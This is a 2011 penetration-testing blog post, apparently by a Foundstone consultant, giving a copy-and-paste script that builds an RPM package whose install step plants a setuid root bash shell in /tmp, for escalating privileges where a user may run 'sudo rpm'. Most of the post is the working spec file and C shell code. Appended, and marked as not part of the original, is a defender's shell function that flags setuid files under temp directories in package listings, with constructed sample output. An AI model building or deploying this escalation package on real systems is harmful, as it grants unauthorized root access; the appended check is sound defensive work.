Thursday, July 21, 2011

Leveraging 'sudo rpm' for privilege escalation

This post is a bit of a break from all the VertX stuff I've been doing. A while ago I wrote this little copy-and-pasteable thing to help out on internal pen tests. On one engagement, I had local access to a system but not root. The user I was logged in as also had the ability to use rpm via sudo. So an easy priv escalation method is to install an RPM that contains a SUID shell.

If you copy and paste it into a shell on your local system, it'll create the rpm (your rpm will be ~/rpm/RPMS/i386/suidshell/suidshell-0.1-1.i386.rpm); then just copy it over to your target system. After you install it, the shell will be in /tmp.

cd ~/
mkdir rpm rpm/BUILD rpm/RPMS rpm/SOURCES rpm/SPECS rpm/SRPMS rpm/tmp
cat > .rpmmacros <<EOF
%_topdir               $HOME/rpm
%_tmppath              $HOME/rpm/tmp
EOF
cd rpm
cat > SPECS/suidshell.spec << --EOF--
%define name suidshell
%define version 0.1
%define release 1

Summary: SUID bash shell
Name: %{name}
Version: %{version}
Release: %{release}
License: LGPL
Group: System Environment/Libraries
Vendor: Brad Antoniewicz

%description
This was originally designed so that if a user has 'sudo rpm' access they can easily escalate privs to root.

-Depends
requires BASH in /bin/bash


Creates a root shell in /tmp

By Brad Antoniewicz
Foundstone

%build
cat > suidshell.c << EOF
#include <unistd.h>
int main() {
/* drop to uid/gid 0, then replace this process with a bash shell */
setuid(0);
setgid(0);
execl("/bin/bash", "-bash", NULL);
return 0;
}
EOF
gcc -o suidshell suidshell.c

%install
install suidshell /tmp/suidshell
chown root:root /tmp/suidshell
chmod 6755 /tmp/suidshell

%files
/tmp/suidshell

--EOF--
rpmbuild -ba SPECS/suidshell.spec
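A defender-side check, added here and not part of the original post: before anyone runs `sudo rpm -i` on a package, list its contents with `rpm -qplv` and refuse any package that carries a setuid or setgid file under a temp directory, which is exactly what the spec above produces. The function below parses that ls-style listing; the sample lines are constructed to mirror the package above and are not real tool output.

```sh
#!/bin/sh
# Added example (not from the original post): gate packages before they are
# installed with sudo rpm. `rpm -qplv pkg.rpm` prints one ls -l style line per
# file; any setuid/setgid entry that lands in a temp directory is refused.
# Usage on a real package:  rpm -qplv pkg.rpm | scan_listing

# Constructed sample of rpm -qplv output (not real tool output): the SUID
# shell from the spec above, a setgid helper, and one harmless doc file.
SAMPLE_LISTING='-rwsr-sr-x    1 root    root        12345 Jul 21  2011 /tmp/suidshell
-rwxr-sr-x    1 root    root         8192 Jul 21  2011 /var/tmp/helper
-rw-r--r--    1 root    root          512 Jul 21  2011 /usr/share/doc/suidshell/README'

# Constructed listing of a package that should pass the check.
CLEAN_LISTING='-rwxr-xr-x    1 root    root        40960 Jul 21  2011 /usr/bin/hello
-rw-r--r--    1 root    root          512 Jul 21  2011 /usr/share/doc/hello/README'

# scan_listing: reads rpm -qlv style lines on stdin, prints every offending
# path, and returns 1 if any was found (0 otherwise).
scan_listing() {
    found=0
    while read -r mode links owner group size mon day year path; do
        [ -z "$mode" ] && continue
        # In the 10-char mode string, position 4 is the owner execute slot
        # (s/S = setuid) and position 7 the group execute slot (s/S = setgid).
        case "$mode" in
            ???[sS]*|??????[sS]*) ;;
            *) continue ;;
        esac
        # Only temp-style locations are flagged here; a setuid file in a
        # system directory still deserves a manual look.
        case "$path" in
            /tmp/*|/var/tmp/*|/dev/shm/*)
                echo "$path"
                found=1
                ;;
        esac
    done
    return "$found"
}

# check_package_listing: convenience wrapper taking the listing text as $1;
# exit status 0 means clean, 1 means at least one path was refused.
check_package_listing() {
    printf '%s\n' "$1" | scan_listing
}
```

This is a cheap gate, not a substitute for limiting what `sudo rpm` may install: a setuid file placed under /usr/bin would pass it, so the path filter is deliberately conservative and should be reviewed for your environment.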
